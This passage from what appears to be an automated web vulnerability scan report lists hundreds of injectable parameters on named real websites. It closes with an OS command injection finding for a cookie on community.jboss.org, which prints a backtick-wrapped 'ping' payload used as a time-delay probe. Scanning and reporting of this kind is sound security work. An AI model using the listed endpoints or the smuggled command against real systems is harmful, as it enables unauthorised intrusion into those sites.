4.313. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsT parameter]

4.314. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsU parameter]

4.315. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsU parameter]

4.316. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsV parameter]

4.317. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsV parameter]

4.318. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsW parameter]

4.319. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsW parameter]

4.320. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsX parameter]

4.321. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsX parameter]

4.322. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsY parameter]

4.323. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsY parameter]

4.324. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsZ parameter]

4.325. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsZ parameter]

4.326. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strLsId parameter]

4.327. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strLsId parameter]

4.328. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegion parameter]

4.329. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegion parameter]

4.330. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegion parameter]

4.331. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegions parameter]

4.332. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegions parameter]

4.333. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strSQL3 parameter]

4.334. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strSQL3 parameter]

4.335. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strStates parameter]

4.336. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strStates parameter]

4.337. http://listings.nytimes.com/BusinessDirectory/View_Listing.asp [CategoryID parameter]

4.338. http://listings.nytimes.com/BusinessDirectory/View_Listing.asp [Lid parameter]

4.339. https://placead.nytimes.com/default.asp [CategoryID parameter]

4.340. https://pro.vembu.com/account.php [error parameter]

4.341. https://pro.vembu.com/account.php [header parameter]

4.342. https://pro.vembu.com/account.php [name of an arbitrarily supplied request parameter]

4.343. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 3]

4.344. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 4]

4.345. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 5]

4.346. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 6]

4.347. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 7]

4.348. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 8]

4.349. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 3]

4.350. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 4]

4.351. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 5]

4.352. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 6]

4.353. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 7]

4.354. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 8]

4.355. http://storegrid.vembu.com/404.php [name of an arbitrarily supplied request parameter]

4.356. http://storegrid.vembu.com/online-backup/active-directory-backup.php [ct parameter]

4.357. http://storegrid.vembu.com/online-backup/active-directory-backup.php [name of an arbitrarily supplied request parameter]

4.358. http://storegrid.vembu.com/online-backup/backup-alerts.php [ct parameter]

4.359. http://storegrid.vembu.com/online-backup/backup-alerts.php [name of an arbitrarily supplied request parameter]

4.360. http://storegrid.vembu.com/online-backup/backup-solutions.php [name of an arbitrarily supplied request parameter]

4.361. http://storegrid.vembu.com/online-backup/bare-metal-image-backup.php [ct parameter]

4.362. http://storegrid.vembu.com/online-backup/bare-metal-image-backup.php [name of an arbitrarily supplied request parameter]

4.363. http://storegrid.vembu.com/online-backup/computer-backup.php [name of an arbitrarily supplied request parameter]

4.364. http://storegrid.vembu.com/online-backup/customer-management.php [ct parameter]

4.365. http://storegrid.vembu.com/online-backup/customer-management.php [name of an arbitrarily supplied request parameter]

4.366. http://storegrid.vembu.com/online-backup/external-disk-backup.php [ct parameter]

4.367. http://storegrid.vembu.com/online-backup/external-disk-backup.php [name of an arbitrarily supplied request parameter]

4.368. http://storegrid.vembu.com/online-backup/flexible-web-console-administration.php [ct parameter]

4.369. http://storegrid.vembu.com/online-backup/flexible-web-console-administration.php [name of an arbitrarily supplied request parameter]

4.370. http://storegrid.vembu.com/online-backup/ms-exchange-backup.php [ct parameter]

4.371. http://storegrid.vembu.com/online-backup/ms-exchange-backup.php [name of an arbitrarily supplied request parameter]

4.372. http://storegrid.vembu.com/online-backup/mssql-backup.php [ct parameter]

4.373. http://storegrid.vembu.com/online-backup/mssql-backup.php [name of an arbitrarily supplied request parameter]

4.374. http://storegrid.vembu.com/online-backup/mysql-backup.php [ct parameter]

4.375. http://storegrid.vembu.com/online-backup/mysql-backup.php [name of an arbitrarily supplied request parameter]

4.376. http://storegrid.vembu.com/online-backup/network-backup.php [name of an arbitrarily supplied request parameter]

4.377. http://storegrid.vembu.com/online-backup/outlook-backup.php [ct parameter]

4.378. http://storegrid.vembu.com/online-backup/outlook-backup.php [name of an arbitrarily supplied request parameter]

4.379. http://storegrid.vembu.com/online-backup/partner-zone.php [name of an arbitrarily supplied request parameter]

4.380. http://storegrid.vembu.com/online-backup/refer-partner.php [name of an arbitrarily supplied request parameter]

4.381. http://storegrid.vembu.com/online-backup/rsync-incremental-backup.php [ct parameter]

4.382. http://storegrid.vembu.com/online-backup/rsync-incremental-backup.php [name of an arbitrarily supplied request parameter]

4.383. http://storegrid.vembu.com/online-backup/security.php [ct parameter]

4.384. http://storegrid.vembu.com/online-backup/security.php [name of an arbitrarily supplied request parameter]

4.385. http://storegrid.vembu.com/online-backup/sharepoint-backup.php [ct parameter]

4.386. http://storegrid.vembu.com/online-backup/sharepoint-backup.php [name of an arbitrarily supplied request parameter]

4.387. http://storegrid.vembu.com/online-backup/storegrid-screenshots.php [ct parameter]

4.388. http://storegrid.vembu.com/online-backup/storegrid-screenshots.php [name of an arbitrarily supplied request parameter]

4.389. http://storegrid.vembu.com/online-backup/support-plans-sp.php [name of an arbitrarily supplied request parameter]

4.390. http://storegrid.vembu.com/online-backup/troubleshooting.php [name of an arbitrarily supplied request parameter]

4.391. http://storegrid.vembu.com/online-backup/vss-volume-shadow-copy-service.php [ct parameter]

4.392. http://storegrid.vembu.com/online-backup/vss-volume-shadow-copy-service.php [name of an arbitrarily supplied request parameter]

4.393. http://storegrid.vembu.com/search-results.php [name of an arbitrarily supplied request parameter]

4.394. http://storegrid.vembu.com/sitemap.php [name of an arbitrarily supplied request parameter]

4.395. http://storegrid.vembu.com/technology-partners.php [name of an arbitrarily supplied request parameter]

4.396. http://storegrid.vembu.com/video.php [name of an arbitrarily supplied request parameter]

4.397. http://storegrid.vembu.com/whitepapers.php [name of an arbitrarily supplied request parameter]

4.398. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html [REST URL parameter 2]

4.399. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html [name of an arbitrarily supplied request parameter]

4.400. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22 [REST URL parameter 2]

4.401. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22 [REST URL parameter 3]

4.402. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22 [name of an arbitrarily supplied request parameter]

4.403. http://www.gmodules.com/gadgets/ifr [url parameter]

4.404. http://www.hitachi.us/connected/#/data/x22 [REST URL parameter 2]

4.405. http://www.hitachi.us/connected/#/data/x22 [REST URL parameter 3]

4.406. http://www.hitachi.us/connected/#/data/x22 [REST URL parameter 4]

4.407. http://www.hitachi.us/connected/#/data/x22 [name of an arbitrarily supplied request parameter]

4.408. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 1]

4.409. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 2]

4.410. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 2]

4.411. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 3]

4.412. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 4]

4.413. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [name of an arbitrarily supplied request parameter]

4.414. http://www.nuxeo.com/embedded/yellow-ribbon-en [REST URL parameter 1]

4.415. http://www.nuxeo.com/embedded/yellow-ribbon-en [REST URL parameter 2]

4.416. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 1]

4.417. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 2]

4.418. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 3]

4.419. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 4]

4.420. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 1]

4.421. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 2]

4.422. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 3]

4.423. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 1]

4.424. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 2]

4.425. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 3]

4.426. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 4]

4.427. http://www.nuxeo.com/en/services/training [REST URL parameter 1]

4.428. http://www.nuxeo.com/en/services/training [REST URL parameter 2]

4.429. http://www.nuxeo.com/en/services/training [REST URL parameter 3]

4.430. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 1]

4.431. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 3]

4.432. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 5]

4.433. http://www.nuxeo.org/discussions/index.jspa [name of an arbitrarily supplied request parameter]

4.434. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 4]

4.435. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 4]

4.436. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 5]

4.437. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 5]

4.438. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 4]

4.439. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 4]

4.440. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 5]

4.441. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 5]

4.442. http://www.nuxeo.org/xwiki/bin/login/XWiki/XWikiLogin [xredirect parameter]

4.443. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 4]

4.444. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 4]

4.445. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 5]

4.446. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 5]

4.447. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 4]

4.448. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 4]

4.449. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 5]

4.450. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 5]

4.451. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 4]

4.452. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 4]

4.453. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 5]

4.454. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 5]

4.455. http://www.nuxeo.org/xwiki/bin/view/Main/ [REST URL parameter 4]

4.456. http://www.nuxeo.org/xwiki/bin/view/Main/ [REST URL parameter 4]

4.457. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 4]

4.458. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 4]

4.459. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 5]

4.460. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 5]

4.461. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 4]

4.462. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 4]

4.463. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 5]

4.464. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 5]

4.465. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 4]

4.466. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 4]

4.467. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 5]

4.468. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 5]

4.469. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 4]

4.470. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 4]

4.471. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 5]

4.472. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 5]

4.473. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 4]

4.474. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 4]

4.475. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 5]

4.476. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 5]

4.477. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 4]

4.478. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 4]

4.479. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 5]

4.480. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 5]

4.481. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 4]

4.482. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 4]

4.483. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 5]

4.484. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 5]

4.485. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 4]

4.486. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 4]

4.487. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 5]

4.488. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 5]

4.489. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 4]

4.490. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 4]

4.491. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 5]

4.492. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 5]

4.493. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 4]

4.494. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 4]

4.495. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 5]

4.496. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 5]

4.497. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 4]

4.498. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 4]

4.499. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 5]

4.500. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 5]

4.501. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 4]

4.502. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 4]

4.503. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 5]

4.504. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 5]

4.505. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 4]

4.506. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 4]

4.507. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 5]

4.508. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 5]

4.509. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 4]

4.510. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 4]

4.511. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 5]

4.512. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 5]

4.513. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 4]

4.514. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 4]

4.515. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 5]

4.516. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 5]

4.517. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 4]

4.518. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 4]

4.519. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 5]

4.520. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 5]

4.521. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 4]

4.522. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 4]

4.523. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 5]

4.524. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 5]

4.525. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 4]

4.526. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 4]

4.527. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 5]

4.528. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 5]

4.529. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 4]

4.530. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 4]

4.531. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 5]

4.532. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 5]

4.533. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 4]

4.534. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 4]

4.535. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 5]

4.536. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 5]

4.537. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 4]

4.538. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 4]

4.539. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 5]

4.540. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 5]

4.541. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 4]

4.542. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 4]

4.543. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 5]

4.544. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 5]

4.545. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 4]

4.546. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 4]

4.547. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 5]

4.548. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 5]

4.549. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 4]

4.550. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 4]

4.551. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 5]

4.552. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 5]

4.553. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 4]

4.554. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 4]

4.555. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 5]

4.556. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 5]

4.557. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 4]

4.558. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 4]

4.559. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 5]

4.560. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 5]

4.561. http://www.pcworld.com/article/186782/google_docs_not_the_only_free_cloud_storage_in_the_sky.html/x22 [REST URL parameter 3]

4.562. http://www.pcworld.com/article/186782/google_docs_not_the_only_free_cloud_storage_in_the_sky.html/x22 [REST URL parameter 4]

4.563. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 2]

4.564. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 3]

4.565. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 4]

4.566. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [name of an arbitrarily supplied request parameter]

4.567. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w\\x22\\x3eToday parameter]

4.568. http://www.rackspacecloud.com/what_is_cloud_computing/x22 [REST URL parameter 1]

4.569. http://www.rackspacecloud.com/what_is_cloud_computing/x22 [REST URL parameter 2]

4.570. http://www.rackspacecloud.com/what_is_cloud_computing/x22 [name of an arbitrarily supplied request parameter]

4.571. http://www.videobox.com/beta/2257.seam [REST URL parameter 1]

4.572. http://www.videobox.com/beta/2257.seam [REST URL parameter 2]

4.573. http://www.videobox.com/beta/clear_channel.seam [REST URL parameter 1]

4.574. http://www.videobox.com/beta/clear_channel.seam [REST URL parameter 2]

4.575. http://www.videobox.com/beta/contact_us.seam [REST URL parameter 1]

4.576. http://www.videobox.com/beta/contact_us.seam [REST URL parameter 2]

4.577. http://www.videobox.com/beta/jobs.seam [REST URL parameter 1]

4.578. http://www.videobox.com/beta/jobs.seam [REST URL parameter 2]

4.579. http://www.videobox.com/beta/member/browse-clips.seam [REST URL parameter 1]

4.580. http://www.videobox.com/beta/member/browse-clips.seam [REST URL parameter 2]

4.581. http://www.videobox.com/beta/member/browse-clips.seam [REST URL parameter 3]

4.582. http://www.videobox.com/beta/premium_channel.seam [REST URL parameter 1]

4.583. http://www.videobox.com/beta/premium_channel.seam [REST URL parameter 2]

4.584. http://www.videobox.com/beta/privacy.seam [REST URL parameter 1]

4.585. http://www.videobox.com/beta/privacy.seam [REST URL parameter 2]

4.586. http://www.videobox.com/beta/reviews.seam [REST URL parameter 1]

4.587. http://www.videobox.com/beta/reviews.seam [REST URL parameter 2]

4.588. http://www.videobox.com/beta/set_channel.seam [REST URL parameter 1]

4.589. http://www.videobox.com/beta/set_channel.seam [REST URL parameter 2]

4.590. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 1]

4.591. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 2]

4.592. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 3]

4.593. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 4]

4.594. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 5]

4.595. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 6]

4.596. http://www.videobox.com/beta/support/home.seam [REST URL parameter 1]

4.597. http://www.videobox.com/beta/support/home.seam [REST URL parameter 2]

4.598. http://www.videobox.com/beta/support/home.seam [REST URL parameter 3]

4.599. http://www.videobox.com/beta/tos.seam [REST URL parameter 1]

4.600. http://www.videobox.com/beta/tos.seam [REST URL parameter 2]

4.601. http://www.videobox.com/beta/tour/browse.seam [REST URL parameter 1]

4.602. http://www.videobox.com/beta/tour/browse.seam [REST URL parameter 2]

4.603. http://www.videobox.com/beta/tour/browse.seam [REST URL parameter 3]

4.604. http://www.videobox.com/beta/tour/flash.seam [REST URL parameter 1]

4.605. http://www.videobox.com/beta/tour/flash.seam [REST URL parameter 2]

4.606. http://www.videobox.com/beta/tour/flash.seam [REST URL parameter 3]

4.607. http://www.videobox.com/beta/tour/how_it_works.seam [REST URL parameter 1]

4.608. http://www.videobox.com/beta/tour/how_it_works.seam [REST URL parameter 2]

4.609. http://www.videobox.com/beta/tour/how_it_works.seam [REST URL parameter 3]

4.610. http://www.videobox.com/beta/tourPages/std_browse_page.seam [REST URL parameter 1]

4.611. http://www.videobox.com/beta/tourPages/std_browse_page.seam [REST URL parameter 2]

4.612. http://www.videobox.com/beta/tourPages/std_browse_page.seam [REST URL parameter 3]

4.613. http://devoxx.com/display/Devoxx2K10/Home [User-Agent HTTP header]

4.614. http://m1055.ic-live.com/840/ [User-Agent HTTP header]

4.615. http://storegrid.vembu.com/cgi-bin/automail [Referer HTTP header]

4.616. http://storegrid.vembu.com/cgi-bin/mail [Referer HTTP header]

4.617. http://www.videobox.com/ [Referer HTTP header]

5. Cookie without HttpOnly flag set

5.1. http://www.partsallover.com.au/home

5.2. http://www.videobox.com/

6. Cross-domain Referer leakage

6.1. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome

6.2. http://www.nuxeo.org/xwiki/bin/export/skins/toucan

7. Cross-domain script include

7.1. http://storegrid.vembu.com/404.php

7.2. http://storegrid.vembu.com/forum/

8. Email addresses disclosed

9. Private IP addresses disclosed

10. Cacheable HTTPS response

11. Content type incorrectly stated



1. OS command injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.jboss.org
Path:   /people/dan.j.allen/blog/2010/10/20/speaking-at-utah-jug

Issue detail

The __utmc cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the __utmc cookie. The application took 35911 milliseconds to respond to the request, compared with 1020 milliseconds for the original request, indicating that the injected command caused a time delay.

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

